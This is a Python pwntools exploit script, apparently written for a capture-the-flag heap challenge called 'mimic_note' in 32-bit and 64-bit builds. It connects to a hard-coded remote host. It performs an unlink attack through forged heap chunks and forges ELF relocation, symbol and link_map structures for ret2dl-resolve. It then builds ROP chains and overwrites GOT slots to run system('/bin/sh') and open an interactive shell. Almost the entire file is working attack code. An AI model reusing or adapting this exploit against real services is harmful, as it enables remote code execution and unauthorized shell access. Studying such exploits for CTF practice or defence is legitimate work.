import glob
import os
import random
import signal
import struct
import sys
import time

from pwn import *
# Optional suffix for the /tmp helper files (GDB_SALT), presumably so that
# several runs of this script on one machine do not share the same paths.
# Unset or empty means no suffix.
salt = os.environ.get('GDB_SALT') or ''
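def clear(signum=None, stack=None):
    """Delete the /tmp gdb helper files written by this script and exit.

    The signature matches a ``signal`` handler so the function can be
    registered as one; both parameters are ignored.

    Removes ``/tmp/gdb_symbols<salt>*``, ``/tmp/gdb_pid<salt>*`` and
    ``/tmp/gdb_script<salt>*``. The files are enumerated with ``glob`` and
    removed with ``os.remove`` instead of running ``rm -f`` through a shell,
    so ``salt`` (which comes from the environment) is never interpolated
    into a command line. Like ``rm -f``, a file that does not exist or
    cannot be removed is ignored. Always terminates the process with
    ``os._exit(0)`` (no interpreter cleanup, no buffered-output flush).
    """
    print('Strip all debugging information')
    for prefix in ('/tmp/gdb_symbols', '/tmp/gdb_pid', '/tmp/gdb_script'):
        for path in glob.glob(prefix + salt + '*'):
            try:
                os.remove(path)
            except OSError:
                # rm -f semantics: best effort, never fail the cleanup.
                pass
    os._exit(0)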
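# Local copy of the target binary. Not referenced by the visible part of
# this script, which only talks to the remote service.
execve_file = './mimic_note_64'

# Target service. Defaults are the hard-coded host/port of the original
# script; override with TARGET_HOST / TARGET_PORT instead of editing it.
sh = remote(os.getenv('TARGET_HOST', '45.32.120.212'),
            int(os.getenv('TARGET_PORT', '6666')))

# Best-effort debugging aid: drop a gdb command file and the pid of the
# local peer process so a debugger can be attached by hand. For a genuinely
# remote target proc.pidof() has nothing to find and the except below
# swallows the resulting error -- the exploit itself does not depend on it.
#
# NOTE(review): the files live under predictable names in the shared /tmp
# directory (only GDB_SALT distinguishes them); on a multi-user box another
# local user could pre-create them. Acceptable for a CTF box, not elsewhere.
try:
    # `&notes` is the target's note table symbol (the original text had it
    # mangled into `¬es` by an HTML-entity decode).
    gdbscript = '''
set $ptr = (char *)&notes
define pr
    x/8gx $ptr+0x40
end
define prr
    x/8wx $ptr
end
# b *0x4006E0
b dl-runtime.c:83
'''
    with open('/tmp/gdb_pid' + salt, 'w') as f:
        f.write(str(proc.pidof(sh)[0]))
    with open('/tmp/gdb_script' + salt, 'w') as f:
        f.write(gdbscript)
except Exception as e:
    # Debugging is optional; report and carry on with the exploit.
    print(e)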
def New(size):
    """Menu option 1: ask the service to allocate a note of ``size`` bytes.

    Every answer is NUL-padded to 31 bytes, like all menu answers in this
    script (presumably the width of the target's input field; unverified here).
    """
    def answer(text):
        return text.ljust(31, '\0')

    sh.sendafter('>> ', answer('1'))
    sh.sendafter('size?\n', answer(str(size)))


def delete(index):
    """Menu option 2: free the note stored at ``index``."""
    choice = '2'.ljust(31, '\0')
    idx = str(index).ljust(31, '\0')
    sh.sendafter('>> ', choice)
    sh.sendafter('index ?\n', idx)
def show(index):
    """Menu option 3: ask the service to print the note at ``index``.

    Only sends the request; reading the reply is left to the caller.
    """
    replies = (('>> ', '3'), ('index ?\n', str(index)))
    for prompt, text in replies:
        sh.sendafter(prompt, text.ljust(31, '\0'))
def edit(index, content):
    """Menu option 4: overwrite the note at ``index`` with ``content``.

    ``content`` is sent exactly as given (no padding); the whole exploit
    uses this helper to place forged heap and ELF structures.
    """
    steps = (
        ('>> ', '4'.ljust(31, '\0')),
        ('index ?\n', str(index).ljust(31, '\0')),
        ('content?\n', content),
    )
    for prompt, reply in steps:
        sh.sendafter(prompt, reply)
def exit():
    """Menu option 5: tell the service to quit.

    Note: this shadows the builtin ``exit``; nothing in the visible script
    calls it, so the shadowing is harmless here but easy to trip over.
    """
    quit_choice = '5'.ljust(31, '\0')
    sh.sendafter('>> ', quit_choice)
# Argument handed to system(): a shell whose stdout is redirected to stderr
# (presumably because stderr, not stdout, is the descriptor we can read
# from -- not verifiable from this script). The trailing NUL terminates the
# string wherever it is written in target memory.
cmd = '/bin/sh 1>&2 \0'

# Address of the note table in the 32-bit and 64-bit builds of the target.
# Absolute addresses: both binaries are assumed to load at a fixed base.
notes_x86, notes_x64 = 0x0804A060, 0x6020A0
# Heap grooming. Two runs of four notes: the 0xfc-byte ones serve the x86
# build, the 0xf8-byte ones the x86-64 build. Each request size makes the
# chunk 0x100 bytes, i.e. the *next* chunk's size field is 0x101 and a
# single NUL written past the end turns it into 0x100 (PREV_INUSE cleared).
# That the target's edit() writes such a byte is an assumption of this
# script -- it is what makes the unlink below fire -- not something visible here.
New(0xfc)
New(0xfc)
New(0xfc)
New(0xfc)
New(0xf8)
New(0xf8)
New(0xf8)
New(0xf8)
# x86 unlink setup inside note 1: fake chunk header (prev_size 0, size
# 0xf8|PREV_INUSE), fd = &notes[1].ptr - 12, bk = &notes[1].ptr - 8, pad to
# 0xf8 and set the following chunk's prev_size to 0xf8. The slot arithmetic
# assumes 8-byte table entries with the pointer first (consistent with
# `notes_x86 + 8 * 8` used later for entry 8).
edit(1, (p32(0) + p32(0xf8 | 1) + p32(notes_x86 + 8 - 12) + p32(notes_x86 + 8 - 8)).ljust(0xf8, 'a') + p32(0xf8))
# x86-64 counterpart inside note 5: size 0xf1 (0xf0|PREV_INUSE), fd/bk at
# &notes[5].ptr - 0x18 / - 0x10, pad to 0xf0, next prev_size = 0xf0.
# Assumes 0x10-byte entries with the pointer first (consistent with
# `notes_x64 + 0x10 * 8` later).
edit(5, (p64(0) + p64(0xf1) + p64(notes_x64 + 0x50 - 0x18) + p64(notes_x64 + 0x50 - 0x10)).ljust(0xf0, 'b') + p64(0xf0))
# Free the chunk after each fake one: backward consolidation unlinks the
# fake chunk and leaves notes[1] (x86) / notes[5] (x64) pointing into the
# note table itself, which every later edit(1, ...) / edit(5, ...) relies on.
delete(2)
delete(6)
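# --- x86: ret2dl-resolve -----------------------------------------------------
# Static addresses from the 32-bit binary's dynamic sections.
rel_plt_addr_x86 = 0x080483c8
dynsym_addr_x86 = 0x080481d8
dynstr_addr_x86 = 0x080482c8

# Forged Elf32_Rel / Elf32_Sym / name placed in writable memory past the note
# table. The symbol sits 0x2570 past .dynsym so its index (0x257) is a whole
# number of 0x10-byte entries; the Elf32_Rel goes 8 bytes in front of it.
fake_elf32_sym = dynsym_addr_x86 + 0x2570
# On x86 the PLT passes a byte offset into .rel.plt (no division needed).
rel_offset_x86 = (fake_elf32_sym - 8) - rel_plt_addr_x86
str_func_x86 = fake_elf32_sym + 0x10
# ELF32_R_INFO(sym_index, R_386_JMP_SLOT = 7). Floor division: the distance
# is an exact multiple of sizeof(Elf32_Sym) by construction, and `//` keeps
# the value an int under Python 3 (int(a / b) detours through a float).
r_info_x86 = (((fake_elf32_sym - dynsym_addr_x86) // 0x10) << 8) + 7
log.info('r_info_x86: ' + hex(r_info_x86))
st_name_x86 = str_func_x86 - dynstr_addr_x86

# notes[1] points into the table after the unlink: set notes[0] to
# (ptr = fake Elf32_Rel, size = 0x400) so edit(0) writes the forgery.
edit(1, p32(0) + p32(fake_elf32_sym - 8) + p16(0x400))
layout_dl_resolve_x86 = [
    p32(0x804A014),    # Elf32_Rel.r_offset: free@got (same value as free_got_addr_x86 below)
    p32(r_info_x86),   # Elf32_Rel.r_info
    p32(st_name_x86),  # Elf32_Sym.st_name -> "system" (written right after)
    p32(0),            # st_value
    p32(0),            # st_size
    p32(0x12),         # st_info = GLOBAL|FUNC, st_other = 0, st_shndx = 0
]
# The name lands at fake_elf32_sym + 0x10 and cmd at fake_elf32_sym + 0x20.
edit(0, flat(layout_dl_resolve_x86) + 'system\0'.ljust(0x10, '\0') + cmd)

# Fake stack frame at 0x804ac00 for the leave;ret pivot used by the final
# trigger: [saved ebp, return to 0x8048440 (presumably PLT0), reloc offset,
# return address for system, argv = &cmd].
edit(1, p32(0) + p32(0x804ac00) + p16(0x400))
layout_x86 = [
    p32(0),
    p32(0x8048440),
    p32(rel_offset_x86),
    p32(0),
    p32(fake_elf32_sym + 0x20),
]
edit(0, flat(layout_x86))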
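# --- x86-64: ret2dl-resolve through a forged struct link_map -----------------
# The fake link_map sits at 0x602020 in the binary's data segment. Only three
# l_info slots are written; the offsets 0x68 / 0x70 / 0xf8 correspond to
# l_info[DT_STRTAB] / l_info[DT_SYMTAB] / l_info[DT_JMPREL] in glibc's
# struct link_map (verify against the target's glibc). l_addr (offset 0) is
# whatever the binary already stores at 0x602020 -- presumably a libc
# pointer, given that the symbol's st_value below is a negative offset that
# gets added to it.
fake_link_map_x64 = 0x602020
# Full-structure layout for reference; not referenced anywhere in this script.
fake_link_map_layout_x64 = [
    '\0' * 0x8,
    p64(fake_link_map_x64 + 0x80),
    p64(fake_link_map_x64 + 0x80),
    p64(0),
    p64(5),
    p64(fake_link_map_x64),
    '\0' * 0x68,
    p64(fake_link_map_x64 + 0x80),
]

# Each edit(5, ...) rewrites notes[4] (pointer, then a 2-byte size) through
# the table pointer the unlink left in notes[5]; edit(4, ...) then writes at
# that address. The addresses involved have a zero top byte, so the [:7]
# truncation loses nothing; presumably it keeps the write (plus whatever
# terminator the target appends) inside the intended slot.
#
# l_info[DT_STRTAB] = l_info[DT_SYMTAB] = link_map + 0x118
edit(5, p64(0) + p64(fake_link_map_x64 + 0x68) + p16(0xf8))
edit(4, p64(fake_link_map_x64 + 0x118) + p64(fake_link_map_x64 + 0x118)[:7])
# l_info[DT_JMPREL] = link_map + 0x118, and at link_map + 0x118 the Elf64_Dyn
# itself: d_tag = 5, d_ptr = link_map + 0x118. All three "tables" therefore
# resolve to link_map + 0x118 = 0x602138.
edit(5, p64(0) + p64(fake_link_map_x64 + 0xf8) + p16(0xf8))
edit(4, p64(fake_link_map_x64 + 0x118) + p64(0) * 3 + p64(5) + p64(fake_link_map_x64 + 0x118)[:7])

rel_plt_addr_x64 = fake_link_map_x64 + 0x118
dynsym_addr_x64 = fake_link_map_x64 + 0x118
dynstr_addr_x64 = fake_link_map_x64 + 0x118

# On x86-64 the PLT pushes a relocation *index*, hence the division by
# sizeof(Elf64_Rela). 0x602420 - 0x602138 = 0x2e8 is an exact multiple of
# 0x18 (index 31). Floor division keeps this an int under Python 3; the
# original true division would hand p64() a float there.
rel_offset_x64 = (0x602420 - rel_plt_addr_x64) // 0x18
fake_elf64_sym = 0x602420 + 0x18
str_func_x64 = fake_elf64_sym + 0x18
# ELF64_R_INFO(sym_index, R_X86_64_JUMP_SLOT = 7); index 32 by construction.
r_info_x64 = (((fake_elf64_sym - dynsym_addr_x64) // 0x18) << 32) + 7
log.info('r_info_x64: ' + hex(r_info_x64))
# Computed but unused: the forged symbol has non-default visibility, so the
# resolver never looks its name up.
st_name_x64 = str_func_x64 - dynstr_addr_x64

# Forge the Elf64_Rela at 0x602420 and the Elf64_Sym right after it at 0x602438.
edit(5, p64(0) + p64(0x602420) + p16(0x400))
layout_dl_resolve_x64 = [
    p64(0x355970),            # r_offset: l_addr + r_offset is the slot the resolver writes to
    p64(r_info_x64),          # r_info
    p64(0),                   # r_addend
    'aaaa',                   # st_name: never dereferenced (see st_other)
    p8(0),                    # st_info
    p8(1),                    # st_other: non-default visibility -> glibc skips the lookup and uses l_addr + st_value
    p16(0x12),                # st_shndx
    p64(0xfffffffffffd5d00),  # st_value: negative offset from l_addr, presumably reaching system()
    p64(0),                   # st_size
]
# cmd ends up at 0x602420 + 0x50, which the ROP chain later loads into rdi.
edit(4, flat(layout_dl_resolve_x64).ljust(0x50, '\0') + cmd)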
# ROP gadgets and PLT/GOT addresses of the two target builds. All absolute,
# i.e. both binaries are assumed to load at a fixed base.
#
# x86-64 gadgets
pop_rdi_ret_x64 = 0x400c33
pop_rbp_ret_x64 = 0x400770
leave_ret_x64 = 0x4008b7
pop_rsi_r15_ret_x64 = 0x400c31
# x86 gadgets. pop_ebp_ret_x86 is not referenced by the visible trigger
# code, which uses 0x080489fa / 0x080489f9 (one and two bytes before it)
# directly.
pop_ebp_ret_x86 = 0x80489fb
leave_ret_x86 = 0x8048568
# x86-64 PLT entries
puts_plt_x64 = 0x400670
read_plt_x64 = 0x4006b0
# GOT slots that get overwritten
atoi_got_addr_x86 = 0x804a030
free_got_addr_x86 = 0x804a014
atoi_got_addr_x64 = 0x602058
# x86-64 ROP chain staged at 0x602c00, the pivot target of the final
# trigger (rbp = 0x602c00; leave; ret). The first qword is the saved-rbp
# slot `leave` consumes; execution starts at the first pop_rdi_ret_x64.
edit(5, p64(0) + p64(0x602c00) + p16(0x400))
layout_x64 = [ p64(0),
# read(0, atoi@got, rdx-as-is): pulls fresh bytes from stdin into atoi@got.
# Presumably consumes the 8 bytes the trigger sends past its 31-byte field.
p64(pop_rdi_ret_x64), p64(0), p64(pop_rsi_r15_ret_x64), p64(atoi_got_addr_x64), p64(0), p64(read_plt_x64),
# puts(0x400CF3): a string inside the binary (contents not visible here).
p64(pop_rdi_ret_x64), p64(0x400CF3), p64(puts_plt_x64),
# 0x400A64 / 0x400AFE / 0x400C71 are addresses inside the binary whose role
# cannot be recovered from this script alone (presumably re-entering parts
# of the menu loop to drive the service's I/O). Left as in the original.
p64(0x400A64),
p64(pop_rdi_ret_x64), p64(0x400CF3), p64(puts_plt_x64),
p64(0x400A64),
p64(0x400AFE),
p64(pop_rdi_ret_x64), p64(0x400C71), p64(puts_plt_x64),
p64(0x400AFE),
p64(0x400AFE), p64(0x400AFE), p64(0x400AFE), p64(0x400AFE), p64(0x400AFE), p64(0x400AFE),
# rdi = &cmd (0x50 past the forged Elf64_Rela at 0x602420).
p64(pop_rdi_ret_x64), p64(0x602420 + 0x50),
# 0x400656: presumably PLT0's `jmp *GOT[2]` (the _dl_runtime_resolve entry);
# the two qwords that follow stand in for what PLT0 would have pushed:
# the (forged) link_map and the relocation index.
p64(0x400656), p64(fake_link_map_x64), p64(rel_offset_x64), ]
edit(4, flat(layout_x64))
# Point notes[8] at a GOT slot on both builds (each build only interprets
# its own width of the payloads): x86 -> free@got, x86-64 -> atoi@got - 4.
edit(1, p32(0) + p32(notes_x86 + 8 * 8) + p8(0xfc))
edit(0, p32(free_got_addr_x86) + p8(0xfc))
edit(5, p64(0) + p64(notes_x64 + 0x10 * 8) + p8(0xf8))
edit(4, p64(atoi_got_addr_x64 - 4) + p8(0xf8))
# One write that serves both builds. x86: the first dword replaces free@got
# with 0x080489fa (one byte before pop_ebp_ret_x86, so presumably a
# pop; pop ebp; ret sequence). x86-64: those 4 bytes land just below
# atoi@got and the next 7 bytes turn atoi@got into pop rdi; ret (the top
# byte, already 0, is left untouched).
edit(8, p32(0x080489fa) + p64(pop_rdi_ret_x64)[:7])
# x86-64 trigger. The menu choice goes through atoi(), now pop rdi; ret:
# the pop eats atoi's return address and the ret presumably lands in the
# input buffer itself, so pop rbp = 0x602c00 followed by leave; ret pivots
# onto the chain staged at 0x602c00. The extra 8 bytes past the 31-byte
# field are presumably what that chain's read(0, atoi@got) consumes.
sh.sendafter('>> ', (p64(pop_rbp_ret_x64) + p64(0x602c00) + p64(leave_ret_x64)).ljust(31, '\0') + p64(0x0000000000400639))
sh.recvuntil('>> ')
# x86 trigger: choose delete (2); the bytes after the choice are the frame
# the hijacked free@got unwinds through -- 0x080489f9 (two bytes before
# pop_ebp_ret_x86, presumably pop; pop; pop ebp; ret), two filler dwords,
# ebp = 0x804ac00, then leave; ret onto the fake frame that calls PLT0 with
# the forged reloc offset (ret2dl-resolve -> system(cmd)). If the x86-64
# chain already succeeded, these bytes simply reach the spawned shell.
sh.sendafter('>> ', '2'.ljust(8, '\0') + p32(0x080489f9) + p32(0) + p32(0) + p32(0x804ac00) + p32(leave_ret_x86))
sh.sendafter('index ?\n', '0\0')
# Hand the session to the user; clean up the /tmp debug files (and exit) afterwards.
sh.interactive()
clear()
|